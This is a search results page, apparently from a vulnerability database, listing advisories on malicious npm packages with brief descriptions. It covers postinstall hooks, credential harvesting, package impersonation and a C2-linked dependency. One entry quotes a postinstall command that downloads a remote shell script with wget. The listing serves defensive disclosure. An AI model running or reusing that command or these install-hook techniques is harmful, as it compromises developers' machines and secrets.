Lucene search
K

241 matches found

OSV
OSV
added 11 hours ago2 views

MAL-2026-10558 Malicious code in akshajrawat.utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 105157af41712b64f8b36ec1cb01e28958e4ad828a0c08d0979a1f6e22d1f13d The package's package.json declares a postinstall lifecycle hook that runs automatically on npm install: node -e...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added yesterday5 views

Malicious code in abuden215 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 895382f96e91ecd3b6a78cac09b905becc2692fef044eacd9ce4d5cb18327b5f The tarball ships auto-publish.sh, a script that republishes the same payload under 100 distinct npm names ishowfeet1-ishowfeet20, nottuff1-nottuff30...

6.2AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added yesterday4 views

Malicious code in backupgenuine-updated (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 163e55285112106141566338db7483490b20567a431458b4b921a71534135ce0 Package published as [email protected] with description "Republished package" actually contains a Vite-built single-page application titled...

6.2AI score
Exploits0References2
OSV
OSV
added 2026/06/29 10:49 a.m.15 views

MAL-2026-6594 Malicious code in vkzmn (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/wormteste/raw/branch/main/downprocwork.sh -O d.sh...

6.2AI score
Exploits0References10
OSV
OSV
added 2026/06/23 12:15 p.m.6 views

MAL-2026-6284 Malicious code in new-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47f6e9bcab53d95265012a31a4dcfc1485ed6db858e788e68ac2ac1ebc33fc34 index.js imports childprocess and contains execSync calls invoking bash and zsh around lines 301 and 317. Without traced execution context, it is not...

6.3AI score
Exploits0References2
OSV
OSV
added 2026/06/12 2:32 p.m.9 views

MAL-2026-5688 Malicious code in ecto-nightly-spirit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5dea0702101217f4a918a23191023bbd9e7d3b5478028bb0868341a574526e97 On npm install, postinstall.js executes unconditionally and performs three installer-harming actions. 1 It enumerates every key/value pair in...

5.4AI score
Exploits0References8
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 9:35 a.m.13 views

Malicious code in rate-limit-flexible (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 166436585b1666871717d2202a01b64cfc580432ad36d90fa05903daf050d8f7 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/08 9:0 a.m.15 views

Malicious code in nodemon-copack (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ad79a82314fcc935b1dbdcb12ca1c413af27877e51058a02665471744f2bcd7a The package is published as 'nodemon-copack' but its package.json wholesale impersonates the legitimate nodemon project: homepage is set to...

5.9AI score
Exploits0References3
OSV
OSV
added 2026/06/04 6:54 p.m.15 views

MAL-2026-5186 Malicious code in autotel-terminal (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47ab3c608b6bea332dc57224c5929d54d923655f3bd225ff30e25c3406b8a9a5 The package's bundled CLI files dist/cli.cjs and dist/cli.js contain co-occurring tokens 'ping' and 'POST' that triggered a network/command...

6.2AI score
Exploits0References20
OSV
OSV
added 2026/05/29 10:2 p.m.12 views

MAL-2026-5080 Malicious code in tailwind-clamps-line (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 091842cb2bfe94e715b2bfec88b04625ea3350097c037d2b172483905633c20e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/23 12:0 a.m.15 views

MAL-2026-4280 Malicious code in node-setup-helpers (npm)

Ten packages published by npm user asdxzxc at version 1.0.10 target developers working on AI and LLM tooling. Each package masquerades as a developer utility while executing a two-stage payload triggered via postinstall: package.json → lib/setup.js → lib/worker.js. Credential harvesting:...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/12 2:58 a.m.9 views

Malicious code in @uipath/agent-tool (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 1bf0a4aecf9abab564a34cce85bbd0992c11840dfce74518bc3f21d5fc4e47ad Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References6
OSV
OSV
added 2026/05/11 11:39 p.m.15 views

MAL-2026-3463 Malicious code in @tanstack/history (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d40d7bafa18dd8987c0ee75b8ffccfc7db076f4521961472d0830ef93a03994e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References8
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/04/20 6:15 a.m.12 views

Malicious code in @kjma/mailcraft (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 69f8916db8f38815341618cd61534b177ef9984ab2dd5774e445bb072fcf10c6 The package @kjma/mailcraft was found to contain malicious code. Source: ghsa-malware 5e4802b882a28ccb6e1c4c9bf610c05c4a2a023d7018fb66c0ac46623b8560d...

5.7AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/03/25 12:36 a.m.12 views

Malicious code in pino-pretty-log (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a2a9c035f47cbd6beb9e2f47299a689f13823a21eaef04fd6abfa9035dcb120e The package pino-pretty-log was found to contain malicious code. Source: ghsa-malware 5ddd0444ff8834bc42162fb1d88cf6d71f6044c2a636cde204484f654ce6589...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/03/17 3:9 a.m.8 views

Malicious code in ember-power-calendar-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 55191162c66f85fd90f4c2bb6354b569a7ab7cdc6a380289defcc8be784ed434 The package ember-power-calendar-utils was found to contain malicious code. Source: ghsa-malware...

5.7AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/03/16 12:39 a.m.6 views

Malicious code in big-numben (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 61c77ff6fcfee6f58a1a8a5a268bb6db596b9059b965e3bcfd58a88a197179e7 The package big-numben was found to contain malicious code. Source: ghsa-malware ae2b54e5805771f2bde8a32bc288306dc173a176a009f4309baf89672a9827fb Any...

5.7AI score
Exploits0References1
OSV
OSV
added 2026/03/16 12:0 a.m.5 views

MAL-2026-1554 Malicious code in typescript-validation-schema (npm)

The package 'typescript-validation-schema' is part of the PhantomRaven supply chain attack campaign Wave 2. It uses a Remote Dynamic Dependency RDD technique: the published package appears benign but includes a URL-based dependency in package.json pointing to an attacker-controlled C2 server...

5.6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/03/13 6:47 a.m.6 views

Malicious code in dell-emc-internal-api-drzak (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 79b1c68a3106c50c73d1ede904d8c6fe7b41466a0e619e50c0935a7988293740 The package dell-emc-internal-api-drzak was found to contain malicious code. Source: ghsa-malware...

5.7AI score
Exploits0References1
OSV
OSV
added 2026/03/03 4:8 a.m.6 views

MAL-2026-1154 Malicious code in rullzdigital (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4cc6a9ad8fc8b038ba42a8fc8e3175d9e519340d5fbb9f36c946d50495efe670 The package rullzdigital was found to contain malicious code. Source: ghsa-malware 661254fd70224e2719b2260797867b5d063b1928340696642f8b683b04473b06 A...

5.7AI score
Exploits0References1
Rows per page
Query Builder